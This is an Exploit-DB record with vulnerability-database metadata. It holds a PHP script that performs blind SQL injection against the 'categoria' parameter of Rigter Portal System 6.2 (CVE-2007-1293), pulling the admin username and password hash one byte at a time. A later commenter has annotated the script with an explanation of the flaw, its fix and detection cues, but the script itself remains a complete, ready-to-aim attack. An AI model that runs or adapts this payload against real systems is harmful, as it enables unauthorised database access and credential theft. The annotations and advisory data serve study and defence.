ID EDB-ID:3403
Type exploitdb
Reporter s0cratex
Modified 2007-03-04T00:00:00
Description
Rigter Portal System (RPS) 6.2 Remote Blind SQL Injection Exploit. CVE-2007-1293. Webapps exploit for php platform
<?
//RPS 6.2 SQL Injection Exploit
//http://www.rps-project.com/
//Need magic_quotes_gpc = Off;
//by s0cratex
//Contact: s0cratex[at]hotmail[dot]com
//Greetings: rgod, 0pt1x 'n mechas.
//
// What this script demonstrates (defender's view): the `categoria` GET
// parameter of /?x=ver_descarga&e=mostrar is placed into a SQL query
// without escaping or parameter binding, so the single quote in the
// payload below closes the string literal and the remainder of the
// request is evaluated as SQL. The technique is boolean-based blind
// injection: each request asks one yes/no question (is byte N of the
// admin username/password equal to value V?) and reads the answer from
// whether the word "Descargar" appears in the HTML response.
//
// Why magic_quotes_gpc must be off: that (long-removed) PHP setting would
// backslash-escape the ' in the payload and break the injection; it was
// never a real fix. The durable application-side fix is a prepared
// statement / bound parameter for `categoria` (plus an integer cast, since
// the value is used as an id).
//
// Detection: the request line below is distinctive -- the same URI hit
// hundreds of times in a row, differing only in two integers, with `/**/`
// in place of spaces and `SELECT`, `IF(`, `ASCII(`, `SUBSTRING(` in the
// query string. An access-log or WAF rule on those tokens in `categoria`,
// or on request volume to this endpoint from a single client, flags this
// traffic.
//
// Portability note: `ereg()` was removed in PHP 7.0, so the script as
// written does not run on a current interpreter.
error_reporting(0);               // hides fsockopen()/fwrite() warnings, e.g. when the host is unreachable
ini_set("max_execution_time",0);  // the extraction loops issue many requests; never time out
ini_set("default_socket_timeout",5);
$host = "localhost"; $path="/rps"; $id=1; // target host, application path, and the rps_admin row id to read
echo "RPS 6.2 SQL Injection exploit\n-----------------------------\n\n";
echo "Username: ";
$j=1;$result="";
// Outer loop: one iteration per character position $j. It stops once a NUL
// byte is appended, which happens when SUBSTRING() runs past the end of the
// value (in MySQL, ASCII('') is 0) and the $x==0 probe therefore succeeds.
while(!strstr($result,chr(0))){
// Inner loop: try every byte value 0..254 for this position; each probe is
// a fresh TCP connection and a fresh SQL query on the server.
for($x=0;$x<255;$x++){
$cnx = fsockopen($host,80);  // NOTE: return value is not checked; with error_reporting(0) a failed connection is never reported
// Injected condition: IF(ASCII(SUBSTRING(username,$j,1))=$x,1,0) against
// rps_admin WHERE id=$id. The trailing /* comments out the rest of the
// application's original query.
fwrite($cnx, "GET ".$path."/?x=ver_descarga&e=mostrar&categoria=-1'/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(username,".$j.",1))=".$x."),1,0))FROM/**/rps_admin/**/WHERE/**/id=".$id.")/* HTTP/1.0\r\nHost: ".$host."\r\n\r\n");
// Oracle: the page renders "Descargar" only when the injected condition is
// true. `break` leaves just this read loop; the for loop still continues
// through the remaining $x values.
while(!feof($cnx)){ if(ereg("Descargar", fgets($cnx))){ $result .= chr($x);
echo chr($x); break; } }
fclose($cnx);
// Dead code: $x is at most 254 inside this loop body, so this never fires.
if ($x==255) {
die("\n Try again...");
}
}
$j++;
}
echo "\n";
echo "Password: ";
// Same procedure for the password column, with $a as the position and $i
// as the candidate byte value.
$a=1;$result2="";
while(!strstr($result2,chr(0))){
for($i=0;$i<255;$i++){
$cnx2 = fsockopen($host,80);  // NOTE: return value is not checked (see above)
fwrite($cnx2, "GET ".$path."/?x=ver_descarga&e=mostrar&categoria=-1'/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(password,".$a.",1))=".$i."),1,0))FROM/**/rps_admin/**/WHERE/**/id=".$id.")/* HTTP/1.0\r\nHost: ".$host."\r\n\r\n");
while(!feof($cnx2)){ if(ereg("Descargar", fgets($cnx2))){ $result2 .=
chr($i); echo chr($i); break; } }
fclose($cnx2);
// Dead code for the same reason as the username loop ($i < 255 here).
if ($i==255) {
die("\n Try again...");
}
}
$a++;
}
// The recovered value is the stored hash, not a cleartext password (the
// author notes crypt() was used).
echo "\nThe password has been encrypted with crypt() function...\n-----------------------------\n by s0cratex";
?>
# milw0rm.com [2007-03-04]
{"bulletinFamily": "exploit", "id": "EDB-ID:3403", "cvelist": ["CVE-2007-1293"], "modified": "2007-03-04T00:00:00", "lastseen": "2016-01-31T18:24:20", "edition": 1, "sourceData": "<?\n//RPS 6.2 SQL Injection Exploit\n//http://www.rps-project.com/\n\n//Need magic_quotes_gpc = Off;\n//by s0cratex\n//Contact: s0cratex[at]hotmail[dot]com\n\n//Salu2: rgod, 0pt1x 'n mechas.\n\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\n$host = \"localhost\"; $path=\"/rps\"; $id=1;\n\necho \"RPS 6.2 SQL Injection exploit\\n-----------------------------\\n\\n\";\necho \"Username: \";\n$j=1;$result=\"\";\nwhile(!strstr($result,chr(0))){\nfor($x=0;$x<255;$x++){\n$cnx = fsockopen($host,80);\nfwrite($cnx, \"GET \".$path.\"/?x=ver_descarga&e=mostrar&categoria=-1'/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(username,\".$j.\",1))=\".$x.\"),1,0))FROM/**/rps_admin/**/WHERE/**/id=\".$id.\")/* HTTP/1.0\\r\\nHost: \".$host.\"\\r\\n\\r\\n\");\nwhile(!feof($cnx)){ if(ereg(\"Descargar\", fgets($cnx))){ $result .= chr($x);\necho chr($x); break; } }\nfclose($cnx);\nif ($x==255) {\ndie(\"\\n Try again...\");\n}\n}\n$j++;\n}\necho \"\\n\";\necho \"Password: \";\n$a=1;$result2=\"\";\nwhile(!strstr($result2,chr(0))){\nfor($i=0;$i<255;$i++){\n$cnx2 = fsockopen($host,80);\nfwrite($cnx2, \"GET \".$path.\"/?x=ver_descarga&e=mostrar&categoria=-1'/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(password,\".$a.\",1))=\".$i.\"),1,0))FROM/**/rps_admin/**/WHERE/**/id=\".$id.\")/* HTTP/1.0\\r\\nHost: \".$host.\"\\r\\n\\r\\n\");\nwhile(!feof($cnx2)){ if(ereg(\"Descargar\", fgets($cnx2))){ $result2 .=\nchr($i); echo chr($i); break; } }\nfclose($cnx2);\nif ($i==255) {\ndie(\"\\n Try again...\");\n}\n}\n$a++;\n}\necho \"\\nThe password has been encrypted with crypt() function...\\n-----------------------------\\n by s0cratex\";\n?>\n\n# milw0rm.com [2007-03-04]\n", "published": "2007-03-04T00:00:00", "href": "https://www.exploit-db.com/exploits/3403/", "osvdbidlist": 
["33831"], "reporter": "s0cratex", "hash": "848c69ee100b58b3fc5441ea0c909ddcd071aa2cc64deac1932f953ec82cfe0f", "title": "Rigter Portal System RPS 6.2 - Remote Blind SQL Injection Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Rigter Portal System (RPS) 6.2 Remote Blind SQL Injection Exploit. CVE-2007-1293. Webapps exploit for php platform", "references": [], "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/3403/", "enchantments": {"vulnersScore": 7.5}}
{"result": {"cve": [{"id": "CVE-2007-1293", "type": "cve", "title": "CVE-2007-1293", "description": "SQL injection vulnerability in Rigter Portal System (RPS) 6.2, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the categoria parameter to the top-level URI (index.php), possibly related to ver_descarga.php.", "published": "2007-03-06T19:19:00", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1293", "cvelist": ["CVE-2007-1293"], "lastseen": "2017-10-11T11:07:02"}], "osvdb": [{"id": "OSVDB:33831", "type": "osvdb", "title": "Rigter Portal System (RPS) index.php categoria Variable SQL Injection", "description": "## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## References:\n[Secunia Advisory ID:24382](https://secuniaresearch.flexerasoftware.com/advisories/24382/)\nOther Advisory URL: http://milw0rm.com/exploits/3403\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0027.html\nISS X-Force ID: 32784\nFrSIRT Advisory: ADV-2007-0813\n[CVE-2007-1293](https://vulners.com/cve/CVE-2007-1293)\nBugtraq ID: 22813\n", "published": "2007-03-03T10:18:49", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/osvdb/OSVDB:33831", "cvelist": ["CVE-2007-1293"], "lastseen": "2017-04-28T13:20:30"}]}}